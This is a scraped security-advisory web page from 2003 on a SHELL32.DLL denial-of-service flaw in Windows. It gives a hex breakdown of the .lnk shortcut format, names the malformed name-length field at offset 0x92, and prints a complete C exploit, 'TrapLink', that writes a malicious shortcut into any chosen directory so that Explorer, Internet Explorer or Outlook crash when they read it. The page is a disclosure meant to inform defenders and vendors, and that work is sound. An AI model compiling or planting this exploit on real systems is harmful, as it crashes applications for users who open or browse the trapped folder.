Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	SHELL32.DLL Denial of Service 11 Dec. 2003    Summary Attackers can turn a media (directory, drive, mail, ...) into a small attacking program allowing it to crash any application that would try to access it using SHELL32.DLL library (Explorer, IE, Outlook).   Credit: The information has been provided by Aur?lien BOUDOUX and Fred CHAVEROT i2s-lab.com. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner As a user browses through his hard-drive, Windows automatically analyses every file of the current directory, so as to allow the system to display the matching icon as well as file informations. When Windows must analyse a shortcut (*.lnk), the system determines the properties of the file indicated by the link using its structure (see: The Windows Shortcut File Format). Here is the structure of a windows link as we have understood it: +-------------------------------------------------------------------+ | Shortcut HEADER                                                   | +-------------------------------------------------------------------+ 00000000 4C00 0000 L...  'L' Magic value 00000004 0114 0200 ....   GUID of shurtcut files 00000008 0000 0000 .... 00000008 C000 0000 .... 00000010 0000 0046 ...F     00000014 8900 0000 ....   Flag 00000018 2000 0000  ...   File attribute 0000001C A0C3 D5A8 ....   Time 1 00000020 478E C301 G... 00000024 A0C3 D5A8 ....   Time 2 00000028 478E C301 G... 0000002C A0C3 D5A8 ....   Time 3 00000030 478E C301 G... 00000034 0000 0000 ....   File length (here 0 bytes) 00000038 0000 0000 ....   Icone number (no icon for us) 0000003C 0100 0000 ....   Normal window 00000040 0000 0000 ....   shortcut (no) 00000044 0000 0000 ....   unknow/reserved 00000048 0000 0000 ....   unknow/reserved +-------------------------------------------------------------------+ | Item Id List                                                      | +-------------------------------------------------------------------+ 0000004C 4600      F.     Size of item id list +-------------------------------------------------------------------+ | First item                                                        | +-------------------------------------------------------------------+ 0000004E 1400      ..     Lenght of first item 00000050 1F50      .P     ??? 00000052 E04F D020 .O.    File lenght 00000056 EA3A 6910 .:i.   ??? +-------------------------------------------------------------------+ | data...                                                           | +-------------------------------------------------------------------+ 0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:\.. 0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q 0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k 0000008A 7574 2E74 7874 0000                     ut.txt.. +-------------------------------------------------------------------+ | vulnerable bytes                                                  | +-------------------------------------------------------------------+ 00000092 0000 0900  ....  name lenght 00000096 2E00       .. 00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 \.k.u.t...t.x.t. name in wide char                                     ` +-------------------------------------------------------------------+ | data...                                                           | +-------------------------------------------------------------------+ 000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X....... 000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k......... 000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V. 000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................ 000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V. 000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................ 00000108 0000 0000 00                            ..... If we modify the name length at the offset 0x92, SHELL32.DLL will cause an access violation error, because text was about to be written outside of the the buffer allocated on the heap for this operation. Exploit: /****************************************  * TrapLink for SHELL32.DLL DoS Exploit *  ****************************************       Discovered & coded by I2S-LaB  ________________________________________         URL : http://www.I2S-LaB.com       MAIL: contact[at]I2S-LaB.com  ________________________________________ *****************************************/ #include <windows.h> void main (int argc, char *argv[]) { HANDLE TrapFile; DWORD NumberOfBytesWritten; unsigned char LnkCrash[] =   "\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00"   "\x00\x00\x00\x46\x89\x00\x00\x00\x20\x00\x00\x00\xA0\xC3\xD5\xA8"   "\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8"   "\x47\x8E\xC3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x00\x14\x00"   "\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30"   "\x30\x9D\x19\x00\x23\x43\x3A\x5C\x00\x00\x00\x00\x00\x00\x00\x00"   "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x84\x17\x00\x32\x00\x00"   "\x00\x00\x00\x49\x2F\x87\x4B\x20\x00\x6B\x75\x74\x2E\x74\x78\x74"   "\x00\x00\xFF\xFF\x09\x00\x2E\x00\x5C\x00\x6B\x00\x75\x00\x74\x00"   "\x2E\x00\x74\x00\x78\x00\x74\x00\x60\x00\x00\x00\x03\x00\x00\xA0"   "\x58\x00\x00\x00\x00\x00\x00\x00\x69\x32\x73\x2D\x77\x32\x6B\x00"   "\x00\x00\x00\x00\x00\x00\x00\x00\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"   "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"   "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"   "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"   "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x00\x00\x00\x00";   printf ("################################\n"     "TrapLink SHELL32.dll DoS exploit\n"     "################################\n"     "By I2S-LAB Team.\n\n"     "http://www.I2S-LaB.com\n\n" );   if (!argv[1])     printf ("Usage : TrapLink <path to trap>\n", argv[0]);   else   {     if ( !SetCurrentDirectory(argv[1]) )       printf ("Error : %s is not a valid directory to trap\n", argv[1] );     else     {       TrapFile = CreateFile("I2S-Crash.lnk",         GENERIC_WRITE, 0,         NULL, CREATE_ALWAYS,         FILE_ATTRIBUTE_NORMAL, NULL );       if (TrapFile == INVALID_HANDLE_VALUE)         printf ("Error : cannot create malicious file.\n");       else       {         WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash), &NumberOfBytesWritten, NULL);         printf ("%s is now trapped with a malicious LNK file\n", argv[1] );       }     }   } } Solution: Microsoft was notified on 11/17/2003 and are planning on getting this fixed as part of the next service pack.  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Novell Zenworks Software Packaging LaunchHelp.dll Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Microsoft Internet Explorer swapNode Handling Code Execution Vulnerability Microsoft Internet Explorer Select Element Insufficient Type Checking Code Execution Vulnerability Internet Explorer Select Element Cache Code Execution Vulnerability Microsoft Office Graph DataFormat Signed Index Code Execution Vulnerability Microsoft Office Excel Conditional Expression Ptg Type Confusion Vulnerability Microsoft Internet Explorer Protected Mode Bypass Vulnerability Microsoft Internet Explorer 9 STYLE Object Parsing Code Execution Vulnerability Microsoft Internet Explorer XSLT SetViewSlave Code Execution Vulnerability CA Total Defense Suite Gateway Security Malformed HTTP Packet Code Execution Vulnerability HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Code Execution Vulnerability TrendMicro Control Manager CASProcessor.exe BLOB Code Execution Vulnerability Symantec Veritas Storage Foundation vxsvc.exe Unicode Code Execution Vulnerability HP iNode Management Center iNodeMngChecker.exe Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®